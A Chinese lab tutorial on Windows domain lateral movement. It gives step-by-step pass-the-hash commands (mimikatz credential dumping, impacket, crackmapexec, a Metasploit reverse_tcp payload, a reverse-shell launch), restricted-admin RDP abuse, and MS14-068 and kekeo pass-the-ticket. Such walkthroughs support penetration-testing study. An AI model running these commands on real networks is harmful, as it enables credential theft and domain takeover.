当前位置: 代码网 > 科技>操作系统>Windows > 内网横向——常见系统传递攻击(1)

内网横向——常见系统传递攻击(1)

2024年08月03日 Windows 我要评论
网络拓扑:攻击机kali IP:192.168.111.0跳板机win7 IP:192.168.111.128,192.168.52.143靶机win server 2008 IP:192.168.52.138。


网络拓扑:
在这里插入图片描述
攻击机kali ip:192.168.111.0
跳板机win7 ip:192.168.111.128,192.168.52.143
靶机win server 2008 ip:192.168.52.138

一、哈希传递

哈希传递(pass the hash,pth)时一直针对ntlm协议的攻击技术,在ntlm身份认证的第三步生成response时,客户端直接使用用户的ntlm哈希值进行计算,用户的明文密码并不参与整个认证过程。也就是说,在windows系统中只使用用户哈希值队访问资源的用户身份进行认证。

1.1 利用mimikatz进行pth

mimikatz中内置了哈希传递的功能,需要本地管理员权限
1、在win 7上尝试不输入密码与域控进行ipc连接。此时,windows会默认使用当前用户的ntlm hash进行ntlm网络认证,win 7的本地管理员不是域用户,显示是连接不上域控的。

在这里插入图片描述
2、将mimikatz上传到跳板机win 7 并执行下面的命令:

# 抓取用户hash
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

获取到域管理员ntlm hash为e037bc75e7afd68ec61c46253bd03f9b

在这里插入图片描述

2、利用抓取到的域管理员的ntlm hash进行hash传递,在win7上执行:

# hash传递攻击
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:god /ntlm:e037bc75e7afd68ec61c46253bd03f9b /run:whoami" exit

默认情况会弹出cmd命令行,在该命令行下可以使用ipc连接去查看域控c盘根目录。用自己创建的cmd进程则不可以。

在这里插入图片描述

1.2 利用impacket进行pth

impacket项目中具备远执行功能的几个脚本都支持哈希传递,例如smbexec.pywmiexec.pypsexec.py

kali上执行

impacket-smbexec -hashes 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b god/administrator@192.168.52.138
# impacket-smbexec -hashes lm hash:ntlm hash <domain>/<username>@ip "command"

在这里插入图片描述

impacket-wmiexec -hashes 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b god/administrator@192.168.52.138
# impacket-wmiexec -hashes lm hash:ntlm hash <domain>/<username>@ip "command"

在这里插入图片描述
win 7上执行

impacket-smbexec -hashes 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b god/administrator@192.168.52.138
# impacket-smbexec -hashes lm hash:ntlm hash <domain>/<username>@ip "command"

在这里插入图片描述

wmiexec.exe -hashes 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b god/administrator@192.168.52.138
# impacket-wmiexec -hashes lm hash:ntlm hash <domain>/<username>@ip "command"

在这里插入图片描述

1.3 使用crackmapexec进行pth

crackmapexec smb 192.168.52.138 -u administrator -h e037bc75e7afd68ec61c46253bd03f9b -d god -x whoami
# crackmapexec smb <ip> -u administrator -h <ntlm hash> -d <domain> -x <command>
# <ip>:可以是单个ip也可以是ip段
# -u:指定用户名
# -h:指定ntlm hash
# -d:指定域
# -x:执行系统命令
# --exec-method:smbexec(system权限)、wmiexec(默认,用户权限)、atexec(system权限)

在这里插入图片描述

1.4 使用powershell

在win 7上远程让靶机(192.168.52.138)运行反弹shell。invoke-thehash项目是一个基于.net tcpclient,通过把 ntlm 哈希传递给 ntlmv2 身份验证协议来进行身份验证的攻击套件,且执行时客户端不需要本地管理员权限。

invoke-smbexec -target 192.168.52.138 -domain god -username administrator -hash 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b -command "c:\users\liukaifeng01\desktop\reverse_shell.exe" -verbose

在这里插入图片描述
在这里插入图片描述

1.5 使用msf进行哈希传递

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.52.1 # kali ip
set lport 7778
set rhosts 192.168.52.138 # 目标ip
set smbuser administrator # 用户名
set smbdomain god # 域名
set smbpass 00000000000000000000000000000000:e037bc75e7afd68ec61c46253bd03f9b
run

在这里插入图片描述

1.6 利用哈希传递登录远程桌面

哈希传递不仅可以在远程主机上执行命令,在特定条件下还可以建立远程桌面连接。需要具备以下条件:

  • 远程主机开启“受限管理员”模式;
  • 用于登录远程桌面的用户位于远程主机的管理员组中;
  • 目标用户的hash。

windows server 2012 r2及以上的版本采用了新版rdp,支持受限管理员模式(restricted admin mode)。开启该模式后,测试人员可以通过哈希传递直接登录远程桌面,不需要明文密码。受限管理员模式在windows 8.1和windows server 2012 r2上默认开启

1、执行以下命令,查看目标主机是否开启受限管理员模式。

# 查看主机是否开启“受限管理员”模式
# 若值为0,则说明启动;若为1,则说明未开启。
reg query "hklm\system\currentcontrolset\control\lsa" /v disablerestrictedadmin

2、在windows server 2012 r2及以上的主机可以使用下面的命令手动开启。

reg add "hklm\system\currentcontrolset\control\lsa" /v disablerestrictedadmin /t reg_dword /d 00000000 /f

3、若远程主机开启了受限管理员模式,则可以通过mimikatz进行利用。

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:xxxx "/run:mstsc.exe /restrictedadmin"

大致原理是:哈希传递成功后执行mstsc.exe /restrictedadmin,以受限管理员模式运行远程桌面客户端,此时不需要用户名密码即可成功登录远程桌面。

二、票据传递

票据传递(pass the ticket,ptt)是一种使用kerberos票据代替明文密码或ntlm hashde的攻击方法。这种攻击方式可以用kerberos票据进行内网渗透,不需要管理员权限,最常见的就是黄金票据白银票据

2.1 ms14-068漏洞

ms14-068是一个windows漏洞,位于域控制器的密钥分发中心的kdcsvc.dll。它允许经过身份验证的用户在其kerberos票据中插入任意pac,并且可能允许攻击者将未授权的域用户账号的权限提升为域管理员权限。攻击者可以通过构造特定的请求包来达到提升权限的目的。

该漏洞的利用条件:

  • 获取域普通用户的账号密码;
  • 获取域普通用户的sid;
  • 服务器未安装kb3011780补丁。

下面的实验是在跳板机win 7上进行的,使用普通域用户账号登录。

1、首先在域控上创建一个普通域用户,然后在win 7上用普通域用户登录。在域god.org中添加一个test用户。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2、在域控上,查看系统是否安装kb3011780补丁,本环境下,域控没有安装相应的补丁。

systeminfo # 查看系统信息,尤其是补丁情况

在这里插入图片描述
3、在win 7上,获取域用户sid。

whoami /all # 查看当前用户的sid
wmic useraccount get name,sid # 查看所有用户的sid

在这里插入图片描述
在这里插入图片描述

4、创建票据之前需要清除win7系统内票据。

mimikatz.exe "kerberos::purge" exit # 清除系统内票据

# 查看系统内存中的票据
kerberos::purge # mimikatz中使用
klist # 直接在命令行中用

在这里插入图片描述

5、在win 7上,使用ms14-068.exe生成域管理员的票据

ms14-068.exe -u administrator@god.org -p hongrisec@2024. -s s-1-5-21-2952760202-1353902439-2381784089-1109 -d 192.168.52.138
# -u:用来指定域用户@域名,这里是administrator用户
# -p:用来指定域用户密码,administrator用户的密码
# -s:当前域用户sid,域用户god\test的sid
# -d:用来指定域控ip

在这里插入图片描述
6、在win 7上,使用mimikatz注入内存

kerberos::ptc tgt_administrator@god.org.ccache

在这里插入图片描述
7、在win 7上,验证权限

dir \\owa.god.org\c$ # 查看域控c盘下的文件
psexec64.exe \\owa.god.org cmd.exe # 拿到域控的shell
# ip访问不行就用域名

在这里插入图片描述
在这里插入图片描述

2.2 使用kekeo进行票据传递

kekeo是一款开源工具,主要用来进行票据传递、s4u2约束委派滥用等。如果想使用kekeo进行票据传递,需要域名、用户名、用户哈希

1、win7上使用本地管理员用户登录,并获取域管理员的ntlm hash

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
# 

在这里插入图片描述

2、在win7上清除系统内存中的票据

mimikatz.exe "kerberos::purge" exit # 清除票据
klist # 查看系统内存中的票据

在这里插入图片描述

3、在win7上生成票据

kekeo.exe "tgt::ask /user:administrator /domain:god.org /ntlm:xxxxx"

在这里插入图片描述
4、在win 7上使用mimikatz将票据导入内存。

mimikatz.exe "kerberos::ptt <票据路径>" exit
klist # 查看票据是否注入成功

在这里插入图片描述
在这里插入图片描述
5、票据传递

dir \\owa.god.org\c$

在这里插入图片描述

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com